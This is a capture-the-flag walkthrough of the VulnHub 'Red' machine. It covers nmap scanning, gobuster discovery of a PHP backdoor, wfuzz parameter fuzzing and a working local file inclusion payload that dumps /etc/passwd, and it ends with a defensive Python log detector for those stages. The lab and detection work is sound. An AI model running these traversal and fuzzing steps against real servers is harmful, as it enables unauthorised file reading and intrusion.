Red was here, Blue is a loser!
CTF RED 1: Walkthrough
Source: https://readysetexploit.gitlab.io/home/vulnhub/red/
nmap
On Kali Linux, first check the Kali Linux IP address
hostname -I
192.168.0.156 fddc:e149:a774::5b6 fddc:e149:a774:0:f944:23ee:7982:825
Find Red's IP address
netdiscover -r 192.168.0.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts

 19 Captured ARP Req/Rep packets, from 19 hosts.   Total size: 1140
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 .....
 192.168.0.155   08:00:27:89:06:41      1      60  PCS Systemtechnik GmbH
 .....
The MAC address 08:00:27:* (PCS Systemtechnik GmbH) appears to be a VirtualBox MAC, so this gives us Red's IP address.
Port scan the target.
sudo nmap -v --min-rate 10000 192.168.0.155 | grep open
Discovered open port 22/tcp on 192.168.0.155
Discovered open port 80/tcp on 192.168.0.155
22/tcp open ssh
80/tcp open http
Run a full port scan
nmap -v -sV -sC -oN nmap 192.168.0.155 -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-09 22:28 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:28
Completed NSE at 22:28, 0.00s elapsed
Initiating NSE at 22:28
Completed NSE at 22:28, 0.00s elapsed
Initiating NSE at 22:28
Completed NSE at 22:28, 0.00s elapsed
Initiating ARP Ping Scan at 22:28
Scanning 192.168.0.155 [1 port]
Completed ARP Ping Scan at 22:28, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:28
Completed Parallel DNS resolution of 1 host. at 22:28, 0.01s elapsed
Initiating SYN Stealth Scan at 22:28
Scanning 192.168.0.155 [65535 ports]
Discovered open port 22/tcp on 192.168.0.155
Discovered open port 80/tcp on 192.168.0.155
Completed SYN Stealth Scan at 22:28, 2.68s elapsed (65535 total ports)
Initiating Service scan at 22:28
Scanning 2 services on 192.168.0.155
Completed Service scan at 22:28, 13.24s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.0.155.
Initiating NSE at 22:28
Completed NSE at 22:28, 1.02s elapsed
Initiating NSE at 22:28
Completed NSE at 22:28, 0.07s elapsed
Initiating NSE at 22:28
Completed NSE at 22:28, 0.00s elapsed
Nmap scan report for 192.168.0.155
Host is up (0.000096s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 8d5365835252c4127249be335dd1e71c (RSA)
|   256 06610a49864364cab00c0f09177b33ba (ECDSA)
|_  256 9b8d90472ac1dc11287d57e08a23b469 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Hacked By Red – Your site has been Hacked! You\xE2\x80\x99ll neve...
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-generator: WordPress 5.8.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:89:06:41 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 22:28
Completed NSE at 22:28, 0.00s elapsed
Initiating NSE at 22:28
Completed NSE at 22:28, 0.00s elapsed
Initiating NSE at 22:28
Completed NSE at 22:28, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.17 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
The result: the target has two open ports,
Port 22 running OpenSSH
Port 80 running Apache HTTP
There is not much we can do with SSH, so let's try the web.
Web
Try accessing the web site
http://192.168.0.155/
It looks like WordPress, but in a hacked (defaced) state.
View the page source (CTRL-U). At the top of the page source you will see
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//redrocks.win' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Hacked By Red &raquo; Feed" href="http://redrocks.win/feed/" />
<link rel="alternate" type="application/rss+xml" title="Hacked By Red &raquo; Comments Feed" href="http://redrocks.win/comments/feed/" />
It seems redrocks.win is the interesting site. We need to add an entry to /etc/hosts so that the hostname redrocks.win resolves to the target.
vi /etc/hosts
Fill it with
192.168.0.155 redrocks.win
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Access / browse the web site
http://redrocks.win/
Click
Hello Blue!
View the source (CTRL-U). There are some interesting clues:
- The words "Looking For It?" appear, which looks like a hint at LFI - Local File Inclusion.
- Mr. Miessler, the author of SecLists, is mentioned.
- It also says "you won't be able to read anything".
Putting it all together:
- the backdoor is most likely not an ordinary shell backdoor,
- but an LFI.
- it is probably worth using a PHP backdoors wordlist, because WordPress runs on Apache with PHP.
Let's test this with gobuster and the common PHP backdoors list
apt update
apt -y install golang-go
go install github.com/OJ/gobuster/v3@latest
apt -y install gobuster
Fetch the CommonBackdoors-PHP list to check against
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
gobuster dir -w CommonBackdoors-PHP.fuzz.txt -x .php -u http://redrocks.win/ -o dir80.txt -z
The result:
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://redrocks.win/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                CommonBackdoors-PHP.fuzz.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2023/02/10 01:54:59 Starting gobuster in directory enumeration mode
===============================================================
/NetworkFileManagerPHP.php (Status: 500) [Size: 0]
===============================================================
2023/02/10 01:55:12 Finished
===============================================================
We see an unusual file: NetworkFileManagerPHP.php
Local File Inclusion
Search Google for the keyword
NetworkFileManagerPHP.php
The result:
Did you mean: Network File Manager PHP.php

webshells/NetworkFileManagerPHP.php at master - GitHub
https://github.com › BlackArch › webshells › blob › Netw...
Various webshells. We accept pull requests for additions to this collection. - webshells/NetworkFileManagerPHP.php at master · BlackArch/webshells.
It appears to be a webshell. But based on the hints we have, Red is using an LFI backdoor.
We need to install a wordlist to look for the parameter name (keyword) that the script accepts.
Be careful: the larger the wordlist / dictionary we use, the harder it becomes to run wfuzz, because the chance of timeouts rises.
Some ways to install wordlists are,
sudo apt -y install seclists
or, for the more complete version,
wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
  && unzip SecList.zip \
  && rm -f SecList.zip
Or we can create a text file containing a few words that might work as the keyword in wfuzz, for example
key
key1
coba
Attack
help
Let's check using wfuzz,
wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/burp-parameter-names.txt
The result:
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test
Total requests: 6453

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000017:   500        0 L      0 W        0 Ch        "ABBR"
000000014:   500        0 L      0 W        0 Ch        "3DSecureStatus"
000000016:   500        0 L      0 W        0 Ch        "A"
000000015:   500        0 L      0 W        0 Ch        "4"
000000013:   500        0 L      0 W        0 Ch        "3"
000000019:   500        0 L      0 W        0 Ch        "ACTION"
000000003:   500        0 L      0 W        0 Ch        "12"
000000018:   500        0 L      0 W        0 Ch        "ACCESSLEVEL"
000000001:   500        0 L      0 W        0 Ch        "1"
000000007:   500        0 L      0 W        0 Ch        "16"
000000012:   500        0 L      0 W        0 Ch        "23"
000000011:   500        0 L      0 W        0 Ch        "22"
000000006:   500        0 L      0 W        0 Ch        "15"
000000010:   500        0 L      0 W        0 Ch        "21"
000000002:   500        0 L      0 W        0 Ch        "11"
000000009:   500        0 L      0 W        0 Ch        "2"
000000008:   500        0 L      0 W        0 Ch        "17"
000000005:   500        0 L      0 W        0 Ch        "14"
000000004:   500        0 L      0 W        0 Ch        "13"
The struggle to find a parameter name usable for the LFI continues. Try,
wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/burp-parameter-names.txt --hh 00
wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/burp-parameter-names.txt --hh 500
wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/burp-parameter-names.txt --hc 404
wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/burp-parameter-names.txt --hc 404,403,400,500
wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/burp-parameter-names.txt --sc 200 -s 1
Or, if we are lucky :) ...
wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/key.txt
The result:
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test
Total requests: 6

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000001:   200        1 L      0 W        1 Ch        "key"
000000002:   500        0 L      0 W        0 Ch        "key1"
000000004:   500        0 L      0 W        0 Ch        "Attack"
000000003:   500        0 L      0 W        0 Ch        "coba"
000000006:   500        0 L      0 W        0 Ch        "http://redrocks.win/NetworkFileManagerPHP.php?=test"
000000005:   500        0 L      0 W        0 Ch        "help"

Total time: 35.85189
Processed Requests: 6
Filtered Requests: 0
Requests/sec.: 0.167355
The interesting line is the 200 response, which turns out to come from the payload "key".
So the parameter name that can be used for the LFI is "key".
Once the key is known we can browse to
view-source:http://redrocks.win/NetworkFileManagerPHP.php?key=../../../../../etc/passwd
The result:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
john:x:1000:1000:john:/home/john:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false
ippsec:x:1001:1001:,,,:/home/ippsec:/bin/bash
oxdf:x:1002:1002:,,,:/home/oxdf:/bin/bash
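As an added example (written for this page, not part of the original walkthrough or of the Red box), here is how the two stages above look from the defender's side in the Apache access log: the wfuzz probing of many parameter names against NetworkFileManagerPHP.php, and the traversal in the key value. The log lines are constructed samples and the fuzzing threshold is an assumption.

```python
"""Flag the two stages seen in this walkthrough in Apache access logs:
parameter-name fuzzing against one script and traversal (LFI) in a query value."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format. The sample lines below are constructed for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) ')
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\|/etc/passwd|/proc/self)", re.I)

SAMPLE_LOG = """\
192.168.0.156 - - [10/Feb/2023:01:55:01 -0500] "GET /NetworkFileManagerPHP.php?ABBR=test HTTP/1.1" 500 0 "-" "Wfuzz/3.1.0"
192.168.0.156 - - [10/Feb/2023:01:55:01 -0500] "GET /NetworkFileManagerPHP.php?ACTION=test HTTP/1.1" 500 0 "-" "Wfuzz/3.1.0"
192.168.0.156 - - [10/Feb/2023:01:55:02 -0500] "GET /NetworkFileManagerPHP.php?ACCESSLEVEL=test HTTP/1.1" 500 0 "-" "Wfuzz/3.1.0"
192.168.0.156 - - [10/Feb/2023:01:55:02 -0500] "GET /NetworkFileManagerPHP.php?key=test HTTP/1.1" 200 1 "-" "Wfuzz/3.1.0"
192.168.0.156 - - [10/Feb/2023:01:56:30 -0500] "GET /NetworkFileManagerPHP.php?key=../../../../../etc/passwd HTTP/1.1" 200 2318 "-" "Mozilla/5.0"
192.168.0.156 - - [10/Feb/2023:01:56:40 -0500] "GET /NetworkFileManagerPHP.php?key=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2318 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Feb/2023:01:57:00 -0500] "GET /index.php?p=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Parse one combined-format line into ip, path, status and query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["url"])
    # keep_blank_values so that "?key=" still counts as a probed parameter name
    params = parse_qsl(parts.query, keep_blank_values=True)
    return {"ip": m["ip"], "path": parts.path, "status": int(m["status"]), "params": params}

def detect(log_text, fuzz_threshold=3):
    """Return (lfi_hits, fuzz_hits).
    lfi_hits: (ip, path, param, decoded value) for every traversal-looking value.
    fuzz_hits: (ip, path, distinct param names, 5xx count) once one client has tried
    at least fuzz_threshold different parameter names against the same script."""
    lfi, stats = [], defaultdict(lambda: {"names": set(), "errors": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        st = stats[(rec["ip"], rec["path"])]
        st["errors"] += int(rec["status"] >= 500)
        for name, value in rec["params"]:
            st["names"].add(name)
            decoded = unquote(unquote(value))  # parse_qsl decoded once; also undo double encoding
            if TRAVERSAL_RE.search(decoded):
                lfi.append((rec["ip"], rec["path"], name, decoded))
    fuzz = [(ip, path, len(s["names"]), s["errors"])
            for (ip, path), s in stats.items() if len(s["names"]) >= fuzz_threshold]
    return lfi, fuzz
```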